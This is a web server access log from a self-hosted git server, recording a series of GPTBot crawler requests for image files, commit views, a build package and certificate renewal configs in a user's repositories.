git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692382] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508485] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" +[17/Feb/2026:14:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641806] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692377] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508483] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699420] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429967] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641804] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" +[17/Feb/2026:14:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641823] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" +[17/Feb/2026:14:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10874] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" +[17/Feb/2026:14:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/weekly" [Client 74.7.227.38] [Length 8598] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:14:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png" +[17/Feb/2026:14:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692382] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498866] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498863] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9887] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 36893] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" +[17/Feb/2026:14:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11682] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:14:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9498] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:14:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" +[17/Feb/2026:14:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11702] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 